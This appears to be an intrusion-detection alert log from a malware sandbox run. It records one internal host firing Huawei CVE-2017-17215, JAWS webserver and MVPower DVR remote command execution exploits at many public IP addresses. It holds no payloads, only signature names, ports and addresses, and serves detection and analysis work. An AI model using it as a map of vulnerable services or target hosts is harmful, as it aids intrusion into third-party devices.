                            06/10/24-15:38:02.308830TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5320480192.168.2.13207.231.246.49
                            06/10/24-15:38:02.824797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945037215192.168.2.1341.91.3.35
                            06/10/24-15:38:02.835522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.13156.30.176.173
                            06/10/24-15:38:00.250990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.13197.56.46.223
                            06/10/24-15:38:02.204471TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3787280192.168.2.13130.15.10.169
                            06/10/24-15:37:59.939523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676837215192.168.2.1341.92.127.129
                            06/10/24-15:38:02.322475TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3938280192.168.2.13187.115.23.27
                            06/10/24-15:38:02.805331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788437215192.168.2.13156.239.33.211
                            06/10/24-15:38:00.005516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.13197.57.68.100
                            06/10/24-15:38:00.258740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388437215192.168.2.13156.254.58.48
                            06/10/24-15:38:02.175217TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3433080192.168.2.13141.155.135.155
                            06/10/24-15:38:02.914938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.13197.246.148.60
                            06/10/24-15:38:00.008064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932437215192.168.2.13156.211.48.76
                            06/10/24-15:38:02.290844TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4644680192.168.2.13146.127.201.93
                            06/10/24-15:37:59.868776TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4204680192.168.2.13195.209.166.102
                            06/10/24-15:37:59.944688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664437215192.168.2.13156.79.10.64
                            06/10/24-15:38:00.209800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602837215192.168.2.13156.46.209.218
                            06/10/24-15:38:00.248812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307037215192.168.2.13197.190.17.120
                            06/10/24-15:38:00.186102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328037215192.168.2.13156.226.178.21
                            06/10/24-15:38:02.694481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172837215192.168.2.13197.76.64.6
                            06/10/24-15:38:02.109647TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5396680192.168.2.1372.31.149.51
                            06/10/24-15:38:02.258309TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5824280192.168.2.13107.69.148.137
                            06/10/24-15:38:02.114754TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5239280192.168.2.1376.129.22.5
                            06/10/24-15:38:02.644240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045037215192.168.2.1341.237.168.85
                            06/10/24-15:38:00.160015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446837215192.168.2.13156.134.62.117
                            06/10/24-15:38:02.240413TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3865880192.168.2.13140.7.159.132
                            06/10/24-15:38:02.840962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819837215192.168.2.13156.94.92.161
                            06/10/24-15:38:02.646438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528037215192.168.2.13197.159.14.165
                            06/10/24-15:38:00.027699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509637215192.168.2.1341.59.124.13
                            06/10/24-15:38:00.270805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775837215192.168.2.1341.129.88.86
                            06/10/24-15:38:02.109019TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6056080192.168.2.13125.86.204.158
                            06/10/24-15:38:00.202797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911437215192.168.2.1341.206.110.186
                            06/10/24-15:38:00.161493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354037215192.168.2.1341.69.228.208
                            06/10/24-15:38:02.506272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278237215192.168.2.13156.211.133.216
                            06/10/24-15:38:00.255864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690437215192.168.2.13197.116.245.45
                            06/10/24-15:37:59.946134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349237215192.168.2.13197.125.224.191
                            06/10/24-15:38:02.917908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713637215192.168.2.13197.51.204.222
                            06/10/24-15:38:02.933795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283837215192.168.2.1341.70.30.5
                            06/10/24-15:38:00.221508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414037215192.168.2.13197.225.243.209
                            06/10/24-15:38:00.017705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466237215192.168.2.1341.253.102.61
                            06/10/24-15:38:02.692312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518637215192.168.2.1341.65.34.75
                            06/10/24-15:38:02.850206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053237215192.168.2.13156.21.120.143
                            06/10/24-15:38:02.866110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.13156.239.132.115
                            06/10/24-15:38:02.709297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370837215192.168.2.1341.0.196.5
                            06/10/24-15:38:00.260140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614237215192.168.2.1341.112.119.1
                            06/10/24-15:37:59.933966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646037215192.168.2.13156.32.132.93
                            06/10/24-15:37:59.986870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704437215192.168.2.13156.218.214.250
                            06/10/24-15:38:02.857260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220637215192.168.2.1341.31.52.172
                            06/10/24-15:38:02.808787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389037215192.168.2.1341.19.84.44
                            06/10/24-15:38:00.019152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732037215192.168.2.13156.12.201.188
                            06/10/24-15:38:00.022727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816437215192.168.2.13156.162.243.21
                            06/10/24-15:38:02.208623TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3373880192.168.2.1360.238.166.80
                            06/10/24-15:37:59.973933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038837215192.168.2.13197.149.113.57
                            06/10/24-15:38:02.741975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395037215192.168.2.1341.157.185.2
                            06/10/24-15:38:02.870630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680837215192.168.2.13156.103.106.207
                            06/10/24-15:37:59.866129TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5201880192.168.2.1320.192.68.43
                            06/10/24-15:38:02.510425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707637215192.168.2.13156.245.92.52
                            06/10/24-15:38:02.922975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.13197.142.139.143
                            06/10/24-15:38:02.834263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933637215192.168.2.13156.66.48.157
                            06/10/24-15:38:02.936119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732837215192.168.2.13156.49.85.159
                            06/10/24-15:37:59.931967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761037215192.168.2.13156.89.39.231
                            06/10/24-15:38:02.167024TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5081880192.168.2.13152.8.91.49
                            06/10/24-15:38:00.237158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212437215192.168.2.1341.235.244.224
                            06/10/24-15:38:00.238002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724237215192.168.2.13197.145.93.184
                            06/10/24-15:38:00.189175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846437215192.168.2.1341.57.17.164
                            06/10/24-15:38:00.162235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769837215192.168.2.1341.34.192.208
                            06/10/24-15:38:02.179580TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3952880192.168.2.1389.154.140.237
                            06/10/24-15:37:59.942479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560637215192.168.2.13197.142.203.17
                            06/10/24-15:38:00.191721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840637215192.168.2.1341.226.55.109
                            06/10/24-15:38:02.149724TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4130880192.168.2.13186.226.52.88
                            06/10/24-15:38:02.644982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071837215192.168.2.13156.152.171.196
                            06/10/24-15:37:59.772200TCP2025883ET EXPLOIT MVPower DVR Shell UCE4915680192.168.2.13181.171.108.67
                            06/10/24-15:38:00.160743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785437215192.168.2.13156.211.139.234
                            06/10/24-15:37:59.964618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437037215192.168.2.13156.201.14.29
                            06/10/24-15:37:59.999497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736837215192.168.2.13156.90.232.117
                            06/10/24-15:38:00.212309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590037215192.168.2.13197.128.202.20
                            06/10/24-15:38:00.239703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393037215192.168.2.1341.183.245.26
                            06/10/24-15:38:00.195434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451837215192.168.2.13156.156.125.193
                            06/10/24-15:38:02.504959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486037215192.168.2.1341.245.146.76
                            06/10/24-15:38:00.029158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493837215192.168.2.13156.205.120.113
                            06/10/24-15:38:00.260853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494037215192.168.2.13197.195.196.75
                            06/10/24-15:38:00.017007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197237215192.168.2.13156.163.189.151
                            06/10/24-15:38:02.689784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534037215192.168.2.13197.81.221.6
                            06/10/24-15:38:02.236761TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5807280192.168.2.13210.226.139.82
                            06/10/24-15:38:00.015623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059037215192.168.2.1341.194.61.76
                            06/10/24-15:38:02.238893TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4686280192.168.2.13206.64.82.156
                            06/10/24-15:37:59.934919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637837215192.168.2.13156.60.90.199
                            06/10/24-15:37:59.983452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404837215192.168.2.13197.255.246.136
                            06/10/24-15:37:59.992068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912837215192.168.2.13156.165.201.247
                            06/10/24-15:38:02.657284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071437215192.168.2.1341.14.88.10
                            06/10/24-15:38:00.230283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332637215192.168.2.1341.63.57.16
                            06/10/24-15:38:00.010670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496437215192.168.2.1341.58.54.58
                            06/10/24-15:38:02.827129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204437215192.168.2.13197.251.250.147
                            06/10/24-15:38:02.778188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601637215192.168.2.1341.186.142.103
                            06/10/24-15:38:02.130177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4992680192.168.2.1348.89.208.8
                            06/10/24-15:38:02.193407TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3746680192.168.2.13213.143.126.69
                            06/10/24-15:38:02.776905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.13197.45.254.180
                            06/10/24-15:38:00.183832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096637215192.168.2.13156.110.2.110
                            06/10/24-15:37:59.948276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644237215192.168.2.13156.98.83.218
                            06/10/24-15:38:02.641252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726237215192.168.2.1341.229.155.150
                            06/10/24-15:37:59.959524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727237215192.168.2.1341.201.89.180
                            06/10/24-15:38:00.245474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392037215192.168.2.13156.244.109.56
                            06/10/24-15:37:59.958705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416437215192.168.2.1341.26.2.2
                            06/10/24-15:38:00.171881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784437215192.168.2.13156.195.94.23
                            06/10/24-15:37:59.925134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047037215192.168.2.13156.57.11.197
                            06/10/24-15:38:00.019873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170837215192.168.2.13156.19.135.49
                            06/10/24-15:38:02.862438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.13156.34.17.184
                            06/10/24-15:38:00.193999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357837215192.168.2.13197.105.96.234
                            06/10/24-15:38:02.723332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750037215192.168.2.13197.47.184.132
                            06/10/24-15:38:00.001255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.13156.15.16.186
                            06/10/24-15:38:00.190024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650437215192.168.2.13197.0.201.185
                            06/10/24-15:38:02.792332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125437215192.168.2.1341.54.19.9
                            06/10/24-15:37:59.996136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044637215192.168.2.13197.226.229.29
                            06/10/24-15:38:02.213753TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100480192.168.2.1392.205.159.254
                            06/10/24-15:38:02.494045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588237215192.168.2.13197.129.137.220
                            06/10/24-15:38:00.025563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044837215192.168.2.13156.11.232.27
                            06/10/24-15:37:59.838365TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3421680192.168.2.1339.251.150.235
                            06/10/24-15:37:59.862278TCP2025883ET EXPLOIT MVPower DVR Shell UCE4359080192.168.2.13200.227.24.116
                            06/10/24-15:38:02.247958TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5285280192.168.2.13174.179.145.49
                            06/10/24-15:37:59.973058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635037215192.168.2.13156.211.89.221
                            06/10/24-15:38:02.264600TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4488880192.168.2.13193.68.253.21
                            06/10/24-15:38:02.501600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.1341.114.65.8
                            06/10/24-15:38:02.802976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560637215192.168.2.13156.104.41.78
                            06/10/24-15:38:02.928461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642437215192.168.2.13197.157.72.91
                            06/10/24-15:38:02.775920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587037215192.168.2.13197.39.173.119
                            06/10/24-15:38:00.020596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662037215192.168.2.13156.24.110.61
                            06/10/24-15:38:00.216411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448237215192.168.2.1341.10.140.61
                            06/10/24-15:38:00.162961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530637215192.168.2.13156.199.176.162
                            06/10/24-15:38:00.024162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236437215192.168.2.13197.238.227.229
                            06/10/24-15:38:02.821238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289037215192.168.2.1341.59.132.123
                            06/10/24-15:37:59.933051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310037215192.168.2.1341.97.23.92
                            06/10/24-15:38:00.003802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375637215192.168.2.13197.244.78.206
                            06/10/24-15:37:59.842965TCP2025883ET EXPLOIT MVPower DVR Shell UCE4927680192.168.2.13219.24.143.221
                            06/10/24-15:38:02.638444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063837215192.168.2.1341.46.185.236
                            06/10/24-15:38:02.498786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735837215192.168.2.13197.25.178.38
                            06/10/24-15:38:02.160403TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5956280192.168.2.13134.74.126.54
                            06/10/24-15:38:02.157918TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6047880192.168.2.13147.71.128.26
                            06/10/24-15:37:59.822693TCP2025883ET EXPLOIT MVPower DVR Shell UCE3432680192.168.2.13161.147.107.200
                            06/10/24-15:38:00.201249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697637215192.168.2.13156.79.171.4
                            06/10/24-15:38:02.245245TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5601080192.168.2.1312.216.25.54
                            06/10/24-15:37:59.802263TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784080192.168.2.1399.27.23.33
                            06/10/24-15:38:00.218073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526237215192.168.2.13156.193.239.253
                            06/10/24-15:38:02.869004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.1341.168.51.174
                            06/10/24-15:38:02.244589TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5522680192.168.2.1363.62.53.197
                            06/10/24-15:38:02.687592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.13156.149.203.68
                            06/10/24-15:38:00.181485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894837215192.168.2.1341.116.99.196
                            06/10/24-15:37:59.927927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111437215192.168.2.13156.18.195.164
                            06/10/24-15:38:02.913437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968437215192.168.2.1341.187.204.30
                            06/10/24-15:38:02.726932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446837215192.168.2.13156.185.253.184
                            06/10/24-15:38:02.930759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.13156.147.57.40
                            06/10/24-15:38:02.491066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795037215192.168.2.13156.134.197.214
                            06/10/24-15:38:02.220012TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4460880192.168.2.13159.234.223.64
                            06/10/24-15:38:02.498091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948837215192.168.2.13156.64.75.27
                            06/10/24-15:38:02.780766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734037215192.168.2.1341.177.168.250
                            06/10/24-15:37:59.871854TCP2025883ET EXPLOIT MVPower DVR Shell UCE3903480192.168.2.13152.83.224.204
                            06/10/24-15:37:59.988624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113037215192.168.2.1341.109.81.128
                            06/10/24-15:38:02.125561TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3328080192.168.2.13106.120.14.251
                            06/10/24-15:38:00.163693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015437215192.168.2.13197.176.59.104
                            06/10/24-15:38:02.147216TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3311680192.168.2.13117.189.134.28
                            06/10/24-15:38:00.223242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004237215192.168.2.13197.42.26.190
                            06/10/24-15:38:02.691059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324437215192.168.2.13156.140.104.46
                            06/10/24-15:38:00.035608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189037215192.168.2.13197.253.99.100
                            06/10/24-15:38:02.836583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306437215192.168.2.13156.2.52.209
                            06/10/24-15:38:02.093026TCP2025883ET EXPLOIT MVPower DVR Shell UCE4766680192.168.2.13132.254.47.159
                            06/10/24-15:38:00.132778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068637215192.168.2.1341.219.156.112
                            06/10/24-15:38:02.303255TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5200480192.168.2.13211.227.251.93
                            06/10/24-15:37:59.936837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791837215192.168.2.13197.192.210.171
                            06/10/24-15:37:59.869779TCP2025883ET EXPLOIT MVPower DVR Shell UCE5677880192.168.2.13124.198.230.56
                            06/10/24-15:37:59.813573TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5562080192.168.2.1346.11.146.222
                            06/10/24-15:38:02.225841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5505080192.168.2.1377.78.60.243
                            06/10/24-15:38:02.228512TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4820880192.168.2.1382.151.58.140
                            06/10/24-15:38:02.640548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217237215192.168.2.13197.78.160.7
                            06/10/24-15:37:59.818135TCP2025883ET EXPLOIT MVPower DVR Shell UCE4019480192.168.2.13111.31.234.213
                            06/10/24-15:38:02.497343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843437215192.168.2.13197.149.87.73
                            06/10/24-15:38:02.865201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873037215192.168.2.13156.8.50.69
                            06/10/24-15:37:59.804504TCP2025883ET EXPLOIT MVPower DVR Shell UCE3595880192.168.2.13158.214.75.80
                            06/10/24-15:38:00.252450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723437215192.168.2.13197.176.22.163
                            06/10/24-15:38:00.253141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248437215192.168.2.13197.229.179.187
                            06/10/24-15:38:00.248014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.13156.132.214.203
                            06/10/24-15:38:02.717243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745637215192.168.2.13156.79.80.1
                            06/10/24-15:38:02.804169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138637215192.168.2.1341.0.102.53
                            06/10/24-15:37:59.829282TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3506680192.168.2.1374.221.113.140
                            06/10/24-15:38:02.813306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045437215192.168.2.13156.192.98.232
                            06/10/24-15:37:59.969655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903437215192.168.2.13197.216.238.129
                            06/10/24-15:38:02.099888TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5094480192.168.2.13177.48.23.109
                            06/10/24-15:37:59.966319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178837215192.168.2.13197.234.232.228
                            06/10/24-15:38:02.921767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795037215192.168.2.1341.78.178.23
                            06/10/24-15:37:59.847523TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5852280192.168.2.1392.126.239.180
                            06/10/24-15:38:02.732625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599837215192.168.2.13197.6.6.199
                            06/10/24-15:38:02.713903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070237215192.168.2.13156.244.102.173
                            06/10/24-15:38:02.223515TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4371680192.168.2.1312.140.219.78
                            06/10/24-15:38:02.203856TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5575680192.168.2.13105.96.207.144
                            06/10/24-15:38:02.868091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097237215192.168.2.13197.16.236.173
                            06/10/24-15:38:02.132169TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3760880192.168.2.1348.136.166.233
                            06/10/24-15:38:00.012098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026837215192.168.2.13197.128.25.119
                            06/10/24-15:38:00.178071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407837215192.168.2.1341.69.149.120
                            06/10/24-15:38:02.768716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366037215192.168.2.1341.150.135.103
